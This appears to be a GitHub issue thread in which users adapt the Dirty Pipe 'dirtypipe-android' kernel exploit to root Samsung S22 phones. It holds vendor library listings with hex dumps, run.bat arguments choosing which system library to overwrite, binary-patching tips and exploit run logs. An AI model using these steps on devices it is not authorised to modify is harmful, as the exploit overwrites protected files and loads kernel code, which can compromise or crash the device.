vendor/lib/libqcodec2_utils.so
vendor/lib/libqcodec2_v4l2codec.so
vendor/lib/libqdMetaData.so
vendor/lib/libqdcm-algo.so
00001000: 5f5f 7661 6c75 655f 7479 7065 494e 3471  __value_typeIN4q
vendor/lib/libqdcm-json-mode-parser.so
vendor/lib/libqdcm-mode-parser.so
vendor/lib/libqdi.so
vendor/lib/libqdma_file_agent.so
00001000: 5f62 6173 6963 5f73 7472 696e 675f 636f  _basic_string_co
vendor/lib/libqdp.so
vendor/lib/libqdpr.so
vendor/lib/libqdutils.so
vendor/lib/libqfp_sensortest.so
vendor/lib/libqisl.so
vendor/lib/libqll.so
vendor/lib/libqll10.so
vendor/lib/libqllengine.so
vendor/lib/libqmi.so
vendor/lib/libqmi_cci.so
vendor/lib/libqmi_client_helper.so
vendor/lib/libqmi_client_qmux.so
vendor/lib/libqmi_common_so.so
vendor/lib/libqmi_csi.so
vendor/lib/libqmi_csvt_srvc.so
vendor/lib/libqmi_encdec.so
vendor/lib/libqmi_legacy.so
vendor/lib/libqmiservices.so
vendor/lib/libqmiservices_ext.so
vendor/lib/libqrtr.so
vendor/lib/libqrtrclient.so
vendor/lib/libqseed3.so
vendor/lib/libqservice.so
vendor/lib/libqshcamera.so
vendor/lib/libqsocket.so
vendor/lib/libqti-iopd-client.so
vendor/lib/libqti-iopd.so
vendor/lib/libqti-perfd-client.so
vendor/lib/libqti-perfd.so
vendor/lib/libqti-util.so
vendor/lib/libqti-utils.so
vendor/lib/libqti_vndfwk_detect.so
vendor/lib/libqti_vndfwk_detect_vendor.so
vendor/lib/libqtigefar.so
vendor/lib/librapidscorer.so
vendor/lib/librcmask.so
vendor/lib/librechdr10plus.sec.so
vendor/lib/librechdr10plus.so
vendor/lib/librecordalive.so
vendor/lib/librmengine.uniplugin@1.0.so
vendor/lib/librmnetctl.so
vendor/lib/librpmb.so
vendor/lib/libsaped.so
vendor/lib/libsavsac.so
vendor/lib/libsavscmn.so
vendor/lib/libsavsvc.so
vendor/lib/libscaler_hw.unifunc.so
vendor/lib/libscaler_sw.unifunc.so
vendor/lib/libscenedetector.uniplugin@1.0.so
vendor/lib/libscveCommon.so
00001000: 5f74 696d 6564 7761 6974 0070 7468 7265  _timedwait.pthre
vendor/lib/libscveCommon_stub.so
vendor/lib/libscveObjectSegmentation.so
vendor/lib/libscveObjectSegmentation_stub.so
vendor/lib/libscveObjectTracker.so
vendor/lib/libscveObjectTracker_stub.so
vendor/lib/libsdedrm.so
vendor/lib/libsdm-color.so
vendor/lib/libsdm-colormgr-algo.so
vendor/lib/libsdm-disp-vndapis.so
vendor/lib/libsdmcore.so
vendor/lib/libsdmextension.so
vendor/lib/libsdmutils.so
vendor/lib/libsdsprpc.so
vendor/lib/libsdynatm.so
vendor/lib/libsec_semRil.so
vendor/lib/libsecaudiocoreutils.so
vendor/lib/libsecaudioinfo.so
vendor/lib/libsecfr_engine.so
vendor/lib/libsecfr_model.so
vendor/lib/libsecnativefeature.so
vendor/lib/libsecril-client.so
vendor/lib/libsecure_storage.so
vendor/lib/libsecureui_svcsock.so
vendor/lib/libsegmentationeffect.uniplugin@1.0.so
vendor/lib/libsegmentationeffect_capture.uniplugin@1.0.so
vendor/lib/libsehbluetooth_audio_session.so
vendor/lib/libsemnativecarrierfeature.so
vendor/lib/libsensorlistener.so
vendor/lib/libsensorndkbridge.so
vendor/lib/libsensorslog.so
vendor/lib/libsevrc.so
vendor/lib/libsfeShiftExtrapolation.so
vendor/lib/libsfplugin_ccodec_utils.so
vendor/lib/libshmemcompat.so
vendor/lib/libshmemutil.so
vendor/lib/libshotsuggestion.so
vendor/lib/libshotsuggestion_engines.so
vendor/lib/libsi.so
vendor/lib/libsmartfocus.uniplugin@1.0.so
vendor/lib/libsmemlog.so
vendor/lib/libsn100u_fw.so
vendor/lib/libsn220u_fw.so
vendor/lib/libsnaace.so
vendor/lib/libsnamrnb.so
vendor/lib/libsnamrwb.so
vendor/lib/libsnapdragoncolor-manager.so
vendor/lib/libsnapdragoncolor-qdcm.so
vendor/lib/libsndcardparser.so
vendor/lib/libsns_device_mode_stub.so
vendor/lib/libsns_direct_channel_stub.so
vendor/lib/libsns_registry_skel.so
vendor/lib/libsnsapi.so
vendor/lib/libsnsdiaglog.so
vendor/lib/libsoc_helper.so
vendor/lib/libsoc_helper_jni.so
vendor/lib/libsocial_image_enhancement.uniplugin@1.0.so
vendor/lib/libspcom.so
vendor/lib/libspeakercalibration.so
vendor/lib/libspictrl.so
vendor/lib/libspl.so
vendor/lib/libsqcp.so
00001000: 5f73 6600 7371 6370 5f74 626c 5f76 715f  _sf.sqcp_tbl_vq_
vendor/lib/libsrib_CNNInterface.camera.samsung.so
vendor/lib/libsrib_humanaware_engine.camera.samsung.so
vendor/lib/libssc.so
vendor/lib/libssc_default_listener.so
vendor/lib/libssd.so
vendor/lib/libssengine.uniplugin@1.0.so
vendor/lib/libstagefright_amrnb_common.so
vendor/lib/libstagefright_bufferpool@2.0.1.so
vendor/lib/libstagefright_bufferqueue_helper_vendor.so
vendor/lib/libstagefright_enc_common.so
vendor/lib/libstagefright_flacdec.so
vendor/lib/libstagefright_foundation_vendor.so
vendor/lib/libstagefright_omx_vendor.so
vendor/lib/libstagefright_soft_aacdec.so
vendor/lib/libstagefright_soft_aacenc.so
vendor/lib/libstagefright_soft_amrdec.so
vendor/lib/libstagefright_soft_amrnbenc.so
vendor/lib/libstagefright_soft_amrwbenc.so
vendor/lib/libstagefright_soft_avcdec.so
vendor/lib/libstagefright_soft_avcenc.so
vendor/lib/libstagefright_soft_flacdec.so
vendor/lib/libstagefright_soft_flacenc.so
vendor/lib/libstagefright_soft_g711dec.so
vendor/lib/libstagefright_soft_gsmdec.so
vendor/lib/libstagefright_soft_hevcdec.so
vendor/lib/libstagefright_soft_mp3dec.so
vendor/lib/libstagefright_soft_mpeg2dec.so
vendor/lib/libstagefright_soft_mpeg4dec.so
vendor/lib/libstagefright_soft_mpeg4enc.so
vendor/lib/libstagefright_soft_opusdec.so
vendor/lib/libstagefright_soft_rawdec.so
vendor/lib/libstagefright_soft_vorbisdec.so
vendor/lib/libstagefright_soft_vpxdec.so
vendor/lib/libstagefright_soft_vpxenc.so
vendor/lib/libstagefright_softomx.so
vendor/lib/libstagefright_softomx_plugin.so
vendor/lib/libstagefrighthw.so
vendor/lib/libstork_shared.so
vendor/lib/libsubsystem_control.so
vendor/lib/libswregistrationalgo.so
vendor/lib/libsynaFpSensorTestNwd.so
vendor/lib/libsynergy_loc_api.so
vendor/lib/libsynx.so
vendor/lib/libsysmon_cdsp_skel.so
vendor/lib/libsystem_health_mon.so
vendor/lib/libtad.so
vendor/lib/libtensorflowLite.singletake.camera.samsung.so
vendor/lib/libtensorflowlite.camera.samsung.so
vendor/lib/libtensorflowlite_gpu.camera.samsung.so
vendor/lib/libtestutils.so
vendor/lib/libtfestriping.so
00001000: 5f75 6273 616e 5f68 616e 646c 655f 6e75  _ubsan_handle_nu
vendor/lib/libthermalclient.so
vendor/lib/libthirdparty_zoomtranslator_imp.so
vendor/lib/libthreadutils.so
vendor/lib/libtime_genoff.so
vendor/lib/libtinycompress.so
vendor/lib/libtinyxml2_1.so
vendor/lib/libtrustedapploader.so
vendor/lib/libtswrappercommon.so
vendor/lib/libtzdrmgenprov.so
vendor/lib/libubifocus.so
vendor/lib/libucm_tlc_comm.so
vendor/lib/libucm_tlc_direct_comm.so
vendor/lib/libucm_tlc_tz_esecomm.so
vendor/lib/libuniplugin.so
vendor/lib/libvdis.uniplugin@1.0.so
vendor/lib/libvdis_core.so
vendor/lib/libvdis_interface.so
vendor/lib/libvibrator.so
vendor/lib/libvicom.so
vendor/lib/libvideobeauty.arcsoft.so
vendor/lib/libvideobeauty.uniplugin@1.0.so
vendor/lib/libvideobeauty_interface.so
vendor/lib/libvideotxr.so
vendor/lib/libvmmem.so
vendor/lib/libvndfwk_detect_jni.qti.so
vendor/lib/libvndfwk_detect_jni.qti_vendor.so
vendor/lib/libvorbisidec.so
vendor/lib/libvpphcp.so
vendor/lib/libvpphvx.so
vendor/lib/libvppimmotion.so
vendor/lib/libvpx.so
vendor/lib/libwpa_client.so
vendor/lib/libwqe.so
vendor/lib/libwsmd_functions.so
vendor/lib/libxml.so
vendor/lib/libxtadapter.so
vendor/lib/libzoomroi.samsung.so
vendor/lib/qti.video.utils.videobufferlayout.so
vendor/lib/sensors.flicker.so
vendor/lib/sensors.grip.so
vendor/lib/sensors.ssc.so
vendor/lib/shared-file-region-aidl-cpp.so
vendor/lib/unihal_cutils@2.1.so
vendor/lib/unihal_main@2.1.so
vendor/lib/unihal_uniplugin@1.0.so
00001000: 5f6c 696e 6b00 6765 745f 706c 7567 696e  _link.get_plugin
vendor/lib/uwb_uci.helios.so
vendor/lib/vendor.display.color@1.0.so
vendor/lib/vendor.display.color@1.1.so
vendor/lib/vendor.display.color@1.2.so
vendor/lib/vendor.display.color@1.3.so
vendor/lib/vendor.display.color@1.4.so
vendor/lib/vendor.display.color@1.5.so
vendor/lib/vendor.display.color@1.6.so
vendor/lib/vendor.display.color@1.7.so
vendor/lib/vendor.display.config@1.0.so
vendor/lib/vendor.display.config@1.1.so
vendor/lib/vendor.display.config@1.10.so
vendor/lib/vendor.display.config@1.11.so
vendor/lib/vendor.display.config@1.2.so
vendor/lib/vendor.display.config@1.3.so
vendor/lib/vendor.display.config@1.4.so
vendor/lib/vendor.display.config@1.5.so
vendor/lib/vendor.display.config@1.6.so
vendor/lib/vendor.display.config@1.7.so
vendor/lib/vendor.display.config@1.8.so
vendor/lib/vendor.display.config@1.9.so
vendor/lib/vendor.display.config@2.0.so
vendor/lib/vendor.display.postproc@1.0.so
vendor/lib/vendor.qti.data.factory@2.0.so
vendor/lib/vendor.qti.data.factory@2.1.so
vendor/lib/vendor.qti.data.factory@2.2.so
vendor/lib/vendor.qti.data.factory@2.3.so
vendor/lib/vendor.qti.data.factory@2.4.so
vendor/lib/vendor.qti.data.mwqem@1.0.so
vendor/lib/vendor.qti.data.slm@1.0.so
vendor/lib/vendor.qti.diaghal@1.0.so
vendor/lib/vendor.qti.esepowermanager@1.0.so
vendor/lib/vendor.qti.esepowermanager@1.1.so
vendor/lib/vendor.qti.gnss-V1-ndk_platform.so
vendor/lib/vendor.qti.gnss-service.so
vendor/lib/vendor.qti.hardware.AGMIPC@1.0-impl.so
vendor/lib/vendor.qti.hardware.AGMIPC@1.0.so
vendor/lib/vendor.qti.hardware.ListenSoundModel@1.0-impl.so
vendor/lib/vendor.qti.hardware.ListenSoundModel@1.0.so
vendor/lib/vendor.qti.hardware.automotive.vehicle@1.0.so
vendor/lib/vendor.qti.hardware.bluetooth_audio@2.0.so
vendor/lib/vendor.qti.hardware.bluetooth_audio@2.1.so
vendor/lib/vendor.qti.hardware.cacert@1.0.so
vendor/lib/vendor.qti.hardware.camera.aon@1.0-service-impl.so
vendor/lib/vendor.qti.hardware.camera.aon@1.0.so
vendor/lib/vendor.qti.hardware.camera.device@1.0.so
vendor/lib/vendor.qti.hardware.camera.postproc@1.0-service-impl.so
vendor/lib/vendor.qti.hardware.camera.postproc@1.0.so
vendor/lib/vendor.qti.hardware.capabilityconfigstore@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.api@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.constants@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.server@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.server@1.1.so
vendor/lib/vendor.qti.hardware.data.connection@1.0.so
vendor/lib/vendor.qti.hardware.data.connection@1.1.so
vendor/lib/vendor.qti.hardware.data.dynamicdds@1.0.so
vendor/lib/vendor.qti.hardware.data.dynamicdds@1.1.so
vendor/lib/vendor.qti.hardware.data.flow@1.0.so
vendor/lib/vendor.qti.hardware.data.latency@1.0.so
vendor/lib/vendor.qti.hardware.data.lce@1.0.so
vendor/lib/vendor.qti.hardware.data.qmi@1.0.so
vendor/lib/vendor.qti.hardware.display.allocator@1.0.so
vendor/lib/vendor.qti.hardware.display.allocator@3.0.so
vendor/lib/vendor.qti.hardware.display.allocator@4.0.so
vendor/lib/vendor.qti.hardware.display.composer@1.0.so
vendor/lib/vendor.qti.hardware.display.composer@2.0.so
vendor/lib/vendor.qti.hardware.display.config-V1-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V2-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V3-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V4-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V5-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.demura@2.0.so
vendor/lib/vendor.qti.hardware.display.mapper@1.0.so
vendor/lib/vendor.qti.hardware.display.mapper@1.1.so
vendor/lib/vendor.qti.hardware.display.mapper@2.0.so
vendor/lib/vendor.qti.hardware.display.mapper@3.0.so
vendor/lib/vendor.qti.hardware.display.mapper@4.0.so
vendor/lib/vendor.qti.hardware.display.mapperextensions@1.0.so
vendor/lib/vendor.qti.hardware.display.mapperextensions@1.1.so
vendor/lib/vendor.qti.hardware.display.mapperextensions@1.2.so
vendor/lib/vendor.qti.hardware.dsp@1.0.so
vendor/lib/vendor.qti.hardware.eid@1.0.so
vendor/lib/vendor.qti.hardware.fingerprint@1.0.so
vendor/lib/vendor.qti.hardware.iop@1.0.so
vendor/lib/vendor.qti.hardware.iop@2.0.so
vendor/lib/vendor.qti.hardware.mwqemadapter@1.0.so
vendor/lib/vendor.qti.hardware.pal@1.0.so
vendor/lib/vendor.qti.hardware.perf@2.0.so
vendor/lib/vendor.qti.hardware.perf@2.1.so
vendor/lib/vendor.qti.hardware.perf@2.2.so
vendor/lib/vendor.qti.hardware.perf@2.3.so
vendor/lib/vendor.qti.hardware.qccsyshal@1.0.so
vendor/lib/vendor.qti.hardware.qccsyshal@1.1.so
vendor/lib/vendor.qti.hardware.qccvndhal@1.0.so
vendor/lib/vendor.qti.hardware.qdutils_disp@1.0.so
vendor/lib/vendor.qti.hardware.qseecom@1.0.so
vendor/lib/vendor.qti.hardware.qteeconnector@1.0.so
vendor/lib/vendor.qti.hardware.servicetracker@1.0.so
vendor/lib/vendor.qti.hardware.servicetracker@1.1.so
vendor/lib/vendor.qti.hardware.servicetracker@1.2.so
vendor/lib/vendor.qti.hardware.slmadapter@1.0.so
vendor/lib/vendor.qti.hardware.soter@1.0.so
vendor/lib/vendor.qti.hardware.systemhelper@1.0.so
vendor/lib/vendor.qti.hardware.trustedui@1.0.so
vendor/lib/vendor.qti.hardware.trustedui@1.1.so
vendor/lib/vendor.qti.hardware.trustedui@1.2.so
vendor/lib/vendor.qti.hardware.tui_comm@1.0.so
vendor/lib/vendor.qti.hardware.vpp@1.1.so
vendor/lib/vendor.qti.hardware.vpp@1.2.so
vendor/lib/vendor.qti.hardware.vpp@1.3.so
vendor/lib/vendor.qti.hardware.vpp@2.0.so
vendor/lib/vendor.qti.ims.callcapability@1.0.so
vendor/lib/vendor.qti.ims.callinfo@1.0.so
vendor/lib/vendor.qti.ims.rcsconfig@1.0.so
vendor/lib/vendor.qti.ims.rcsconfig@1.1.so
vendor/lib/vendor.qti.ims.rcsconfig@2.0.so
vendor/lib/vendor.qti.ims.rcsconfig@2.1.so
vendor/lib/vendor.qti.latency@2.0.so
vendor/lib/vendor.qti.latency@2.1.so
vendor/lib/vendor.qti.memory.pasrmanager@1.0.so
vendor/lib/vendor.qti.memory.pasrmanager@1.1.so
vendor/lib/vendor.qti.power.pasrmanager@1.0.so
vendor/lib/vendor.qti.qspmhal@1.0.so
vendor/lib/vendor.qti.spu@1.0.so
vendor/lib/vendor.qti.spu@1.1.so
vendor/lib/vendor.qti.spu@2.0.so
vendor/lib/vendor.qti.voiceprint@1.0.so
vendor/lib/vendor.samsung.hardware.audio@1.0.so
vendor/lib/vendor.samsung.hardware.biometrics.face@2.0.so
vendor/lib/vendor.samsung.hardware.bluetooth.a2dp@1.0.so
vendor/lib/vendor.samsung.hardware.bluetooth.a2dpsink@1.0.so
vendor/lib/vendor.samsung.hardware.bluetooth.audio@2.0.so
vendor/lib/vendor.samsung.hardware.camera.device@5.0-impl.so
vendor/lib/vendor.samsung.hardware.camera.device@5.0.so
vendor/lib/vendor.samsung.hardware.camera.provider@4.0-legacy.so
vendor/lib/vendor.samsung.hardware.camera.provider@4.0.so
vendor/lib/vendor.samsung.hardware.health@2.0.so
vendor/lib/vendor.samsung.hardware.hqm@1.0.so
vendor/lib/vendor.samsung.hardware.hyper-V2-ndk_platform.so
vendor/lib/vendor.samsung.hardware.security.hdcp.wifidisplay-V2-ndk_platform.so
vendor/lib/vendor.samsung.hardware.snap@1.0.so
vendor/lib/vendor.samsung.hardware.snap@1.1.so
vendor/lib/vendor.samsung.hardware.snap@1.2.so
vendor/lib/vendor.samsung.hardware.thermal@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.blockchain@1.0-impl.so
vendor/lib/vendor.samsung.hardware.tlc.blockchain@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.hdm@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.hdm@1.1-impl.so
vendor/lib/vendor.samsung.hardware.tlc.hdm@1.1.so
vendor/lib/vendor.samsung.hardware.tlc.payment@1.0-impl.so
vendor/lib/vendor.samsung.hardware.tlc.payment@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.ucm@2.0-impl.so
vendor/lib/vendor.samsung.hardware.tlc.ucm@2.0.so
vendor/lib/vendor.samsung.hardware.uwb@1.0.so
vendor/lib/vintf-codecsolution-V2-ndk_platform.so

@elliwigy
Copy link

Hey elliwigy how are you doing, ok i will check as you instructrd above i do see that libstagefright_soft_mp3dec.so on s22 doesnt seem to exist there other libstagefright libs there how i have not yet checked offset i will do so later today or tomorrow.

It does exist on s22 ultra (SM-S908U) which is what I posted above in /vendor/lib.. not sure why the S22 would be any different?

@polygraphene
Copy link
Owner

You cannot run the command on device. You must extract firmware image on Linux PC like ubuntu.

According to your output, we can choose lib for overwrite.
The following libraries are the best because it is not so frequently used (I think).

vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p

Download 1.0.2 from release page, then edit run.bat to append arguments like:

%adb% shell %dir%/dirtypipe-android -f /vendor/lib/libcamxifestriping.so

Then launch run.bat and check adb logcat.

@elliwigy
Copy link

You cannot run the command on device. You must extract firmware image on Linux PC like ubuntu.

According to your output, we can choose lib for overwrite. The following libraries are the best because it is not so frequently used (I think).

vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p

Download 1.0.2 from release page, then edit run.bat to append arguments like:

%adb% shell %dir%/dirtypipe-android -f /vendor/lib/libcamxifestriping.so

Then launch run.bat and check adb logcat.

I will try this tonight and report back with logcat..

Just out of curiosity, why do you say you cannot run it on the device when the output I provided is from the device? lol

In normal adb shell running as normal shell you cannot view vendor/lib as you get permission denied but if you run as "vendor_shell" you can view the vendor/lib files just fine and can run your commands you posted earlier as I did when sharing the output..

You can try it yourself.. from a regular terminal you simply type:

adb shell /vendor/bin/sh

Then type:

id

and your output should show you are running as vendor_shell where you can then view vendor/lib directory no problem and without having to download firmware, unsparse super.img, lpunpack super.img and mount vendor which is a lot more work and space used lol.. just saying :-)

@oakieville
Copy link
Author

run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 2.7 MB/s (44688 bytes in 0.016s)
startup-root: 1 file pushed, 0 skipped. 0.1 MB/s (3671 bytes in 0.028s)
magisk/busybox: 1 file pushed, 0 skipped. 66.9 MB/s (2102536 bytes in 0.030s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 111.1 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 0.7 MB/s (2823823 bytes in 3.877s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/r0qsqw/r0q:12/SP1A.210812.016/S901USQU1AVC8:user/release-keys
Stage2 libname for kmod overwrite: /vendor/lib/libcamxifestriping.so
Offset found: shellcode_offset: a57d0 hook_offset: 5b260
Empty space size: 2096 bytes
Run index: 0
Shell code size: 308 0x134 bytes
open failed: No such file or directory

logcat is here

http://oakieville.com/logcat.txt

@oakieville
Copy link
Author

seems it cant access vendor/lib/* files

@Dog10dogg
Copy link

Dog10dogg commented Mar 29, 2022

The reason I believe it says the file is not found is because the file "/system/lib/libldacBT_enc.so" does not exist on the smasungs.

My work around was (instead of compiling)
Opened the release file "dirtypipe-android" in HxD Changed both places that contained "/system/lib/libldacBT_enc.so" with "/////system/lib/random.so" (the first "/" and the ."so" has to line up but you can have as many beginning "/" as you need to null out extra letters in the path name)
Periods before and after the path name are hex "00" and not actually periods.

It'll run but crashes my device almost immediately. It does work tho as I can use it to copy normally unreadable files and copy them to sdcard.
I believe it is either knox or the module needs to be trailered to Samsung's kernel.
I would attach the log but it crashes without any log output on adb.
Also the libs between s908u and s908u1 are different. Only two of the possibilities were the same for me.
I used several vendor libs but mostly picked this one /vendor/lib/libcamxifestriping.so due to it beening the same across both models.

I can use the vendor shell to look at the modules on vendor_dklh/lib/modules (I think?). I did see a file called something like "policy config.ko" but it doesn't look like it lines up with the "mymod.ko". That may be irrelevant tho.

@oakieville
Copy link
Author

/system/lib/libldacBT_enc.so isnt what it was calling if you look at the code it print "Stage2 libname for kmod overwrite: /vendor/lib/libcamxifestriping.so" from same varible it loads lib from, i beleave as elliwigy explained it requires being /vender/bin/sh to access those libs correctly

lib/libextmediaformatdef.so
00001000: 5f63 726f 7000 6369 7479 2d69 6400 7472 _crop.city-id.tr

maybe this?

@Dog10dogg
Copy link

The program writes to /system/lib/libldacBT_enc.so and then uses that to write to the vendor files.

The Payload in libc++ mmaps libldacBT_enc.so for stage2 payload which is located in /system/lib/libldacBT_enc.so which the s22 ultra doesn't have.

Edit the file and try it and it'll say it worked but reboots. You can edit startup root and have it copy files to the sdcard that you can't normally access.

@elliwigy
Copy link

The program writes to /system/lib/libldacBT_enc.so and then uses that to write to the vendor files.

The Payload in libc++ mmaps libldacBT_enc.so for stage2 payload which is located in /system/lib/libldacBT_enc.so which the s22 ultra doesn't have.

Edit the file and try it and it'll say it worked but reboots. You can edit startup root and have it copy files to the sdcard that you can't normally access.

S22 Ultra does have it:

/system/lib64/libldacBT_enc.so

Of course its in lib64 not lib dir..

@elliwigy
Copy link

The program writes to /system/lib/libldacBT_enc.so and then uses that to write to the vendor files.

The Payload in libc++ mmaps libldacBT_enc.so for stage2 payload which is located in /system/lib/libldacBT_enc.so which the s22 ultra doesn't have.

Edit the file and try it and it'll say it worked but reboots. You can edit startup root and have it copy files to the sdcard that you can't normally access.

so maybe edit it to use the same so file but in lib64

@polygraphene
Copy link
Owner

You cannot run the command on device. You must extract firmware image on Linux PC like ubuntu.
According to your output, we can choose lib for overwrite. The following libraries are the best because it is not so frequently used (I think).

vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p

Download 1.0.2 from release page, then edit run.bat to append arguments like:

%adb% shell %dir%/dirtypipe-android -f /vendor/lib/libcamxifestriping.so

Then launch run.bat and check adb logcat.

I will try this tonight and report back with logcat..

Just out of curiosity, why do you say you cannot run it on the device when the output I provided is from the device? lol

In normal adb shell running as normal shell you cannot view vendor/lib as you get permission denied but if you run as "vendor_shell" you can view the vendor/lib files just fine and can run your commands you posted earlier as I did when sharing the output..

You can try it yourself.. from a regular terminal you simply type:

adb shell /vendor/bin/sh

Then type:

id

and your output should show you are running as vendor_shell where you can then view vendor/lib directory no problem and without having to download firmware, unsparse super.img, lpunpack super.img and mount vendor which is a lot more work and space used lol.. just saying :-)

That's absolutely right. My bad.
It was unnecessary to extract firmware. Thanks!

@polygraphene
Copy link
Owner

run.bat dirtypipe-android: 1 file pushed, 0 skipped. 2.7 MB/s (44688 bytes in 0.016s) startup-root: 1 file pushed, 0 skipped. 0.1 MB/s (3671 bytes in 0.028s) magisk/busybox: 1 file pushed, 0 skipped. 66.9 MB/s (2102536 bytes in 0.030s) magisk/magiskpolicy: 1 file pushed, 0 skipped. 111.1 MB/s (672928 bytes in 0.006s) 4 files pushed, 0 skipped. 0.7 MB/s (2823823 bytes in 3.877s) Ignore device info. Device version: Product=qssi Fingerprint=samsung/r0qsqw/r0q:12/SP1A.210812.016/S901USQU1AVC8:user/release-keys Stage2 libname for kmod overwrite: /vendor/lib/libcamxifestriping.so Offset found: shellcode_offset: a57d0 hook_offset: 5b260 Empty space size: 2096 bytes Run index: 0 Shell code size: 308 0x134 bytes open failed: No such file or directory

logcat is here

http://oakieville.com/logcat.txt

There doesn't seem to be "/system/lib/libldacBT_enc.so" as @Dog10dogg said.
Actually "libldacBT_enc.so" can be any file which is not so frequently used by system.
You can choose 64bit "/system/lib64/libldacBT_enc.so". I will add option to change this lib.

stage2_lib (/system/lib/libldacBT_enc.so) and stage2_param_libname(/vendor/lib/libstagefright_soft_mp3dec.so in Pixel 6) are confusing name, but have different roles.
dirtypipe-android (shell process) overwrite stage2_lib to send code to be executed in init process.
Then init process overwrite stage2_param_libname so that it have content of mymod.ko.

@polygraphene
Copy link
Owner

I would attach the log but it crashes without any log output on adb.

So we should investigate what is causing this crash.
I will upload debug version later.

@oakieville
Copy link
Author

oakieville commented Mar 29, 2022

Also if change that to a lib in system lib in the command it doesnt say file not found or atleast didnt when i tried it

@polygraphene
Copy link
Owner

polygraphene commented Mar 29, 2022

dirtypipe-android-1.0.3-debug1.zip

Try this version.
This version should output logcat like following if stage1 has run successfully:

$ adb shell
oriole:/ $ logcat | grep libc
03-29 21:47:19.811 24886   375 F libc    : Fatal signal 7 (SIGBUS), code 1 (BUS_ADRALN), fault addr 0x7fad3d4001 in tid 24886 (init), pid 24886 (init)

In addition to logcat, paste output of run.bat here.

If it still reboot, there is something wrong in stage1.

Even if device doesn't reboot, please manually reboot after launch run.bat. Because it won't automatically restore file content. Reboot is required to restore original files.

@polygraphene
Copy link
Owner

dirtypipe-android-1.0.3-debug2.zip

Try second version if you got "libc : Fatal signal ..." in logcat.
It will generate empty file on /dev/.s2a if stage2 was successfully called.

Run adb shell ls /dev/.s2a to check if file exists
When file exists, it says "Permission denied":

$ adb shell ls /dev/.s2a
ls: /dev/.s2a: Permission denied

When not exists (failed to call stage2), it says "No such file or directory" (or reboot):

 $ adb shell ls /dev/.s2a
ls: /dev/.s2a: No such file or directory

@polygraphene
Copy link
Owner

dirtypipe-android-1.0.3-debug3.zip
Try third version if you got "Permission denied".

It will produce following logcat if modprobe was successfully launched:

$ adb shell
oriole:/ $ logcat | grep modprobe
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:76): avc: denied { read } for path="/dev/.dirtypipe-0005" dev="tmpfs" ino=1166 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=0
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:77): avc: denied { read } for path="pipe:[63464]" dev="pipefs" ino=63464 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=0
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:78): avc: denied { write } for path="pipe:[63464]" dev="pipefs" ino=63464 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=0
03-29 22:25:08.331  3278  3278 I modprobe-payload: Parsed lib_mod: /vendor/lib/libstagefright_soft_mp3dec.so
03-29 22:25:08.331  3278  3278 I modprobe-payload: Content: 5f 24 03 d5 a8 88 84 d2

If failed, it might reboot or doesn't output any log.

@polygraphene
Copy link
Owner

dirtypipe-android-1.0.3-beta.zip

Try this version if you succeeded to run debug1-3.
If this version still reboot the device, there is something wrong on kernel module.

@elliwigy
Copy link

dirtypipe-android-1.0.3-debug2.zip

Try second version if you got "libc : Fatal signal ..." in logcat. It will generate empty file on /dev/.s2a if stage2 was successfully called.

Run adb shell ls /dev/.s2a to check if file exists When file exists, it says "Permission denied":

$ adb shell ls /dev/.s2a
ls: /dev/.s2a: Permission denied

When not exists (failed to call stage2), it says "No such file or directory" (or reboot):

 $ adb shell ls /dev/.s2a
ls: /dev/.s2a: No such file or directory

Output of run.bat

dirtypipe-android: 1 file pushed, 0 skipped. 0.2 MB/s (45168 bytes in 0.186s)
startup-root: 1 file pushed, 0 skipped. 0.6 MB/s (3671 bytes in 0.006s)
magisk/busybox: 1 file pushed, 0 skipped. 85.1 MB/s (2102536 bytes in 0.024s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 58.6 MB/s (672928 bytes in 0.011s)
4 files pushed, 0 skipped. 8.5 MB/s (2824303 bytes in 0.318s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
Offset found: shellcode_offset: a57d0 hook_offset: 5b260 first instruction: d503233f
Empty space size: 2096 bytes
Run index: 8
Stage1 debug filename: /dev/.dirtypipe-0008
Shell code size: 344 0x158 bytes
It worked!
Press any key to continue . . .

Logcat

It crashes before can check the /dev exists.. It does a kernel panic.

@elliwigy
Copy link

dirtypipe-android-1.0.3-beta.zip

